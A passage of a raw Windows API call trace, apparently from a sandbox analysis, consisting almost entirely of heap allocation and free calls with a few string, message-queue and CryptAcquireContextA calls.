(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0134.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0134.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0134.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0134.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0134.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0134.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0134.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0134.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0134.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0134.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0134.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0134.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0134.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0134.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0134.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0134.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0134.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0134.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0134.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0134.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547d8 | out: hHeap=0x970000) returned 1 [0134.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0134.535] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0134.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0134.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0134.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0134.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0134.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0134.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0134.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0134.535] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0134.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0134.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0134.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0134.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0134.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0134.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0134.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0134.535] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0134.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0134.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0134.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0134.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0134.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0134.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0134.536] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0134.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0134.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0134.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0134.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0134.536] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0134.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0134.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0134.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0134.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0134.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0134.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0134.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0134.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0134.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0134.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0134.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0134.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0134.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0134.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0134.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0134.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0134.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0134.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0134.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0134.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0134.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0134.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0134.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0134.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0134.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0134.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0134.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0134.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0134.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0134.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0134.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0134.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0134.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0134.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0134.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0134.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0134.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547d8 | out: hHeap=0x970000) returned 1 [0134.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0134.537] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0134.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0134.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0134.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0134.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0134.537] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0134.537] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0134.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0134.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0134.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0134.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0134.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0134.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0134.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0134.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0134.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0134.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0134.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0134.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0134.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0134.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0134.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0134.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0134.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0134.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0134.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0134.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0134.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0134.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0134.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0134.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0134.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0134.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0134.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69a48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0134.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0134.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0134.650] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0134.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0134.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0134.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0134.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69b28, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0134.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0134.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0134.650] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0134.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0134.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0134.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0134.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0134.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0134.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0134.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0134.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0134.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0134.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0134.651] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0134.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0134.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0134.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0134.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0134.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0134.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0134.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0134.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0134.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0134.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0134.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0134.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0134.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0134.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0134.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0134.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0134.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0134.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0134.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0134.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0134.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0134.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0134.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0134.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0134.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0134.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0134.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0134.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0134.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0134.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0134.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0134.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0134.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0134.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0134.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0134.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0134.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0134.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0134.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0134.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0134.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0134.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0134.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0134.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0134.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0134.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0134.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0134.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0134.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0134.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0134.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547d8 | out: hHeap=0x970000) returned 1 [0134.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0134.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0134.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0134.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0134.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0134.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0134.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0134.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0134.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0134.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0134.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0134.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0134.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0134.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0134.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0134.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0134.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0134.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0134.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0134.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0134.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0134.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0134.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0134.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0134.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0134.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0134.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0134.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0134.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0134.655] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0134.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0134.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0134.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0134.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0134.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0134.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0134.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0134.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0134.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0134.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0134.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0134.656] 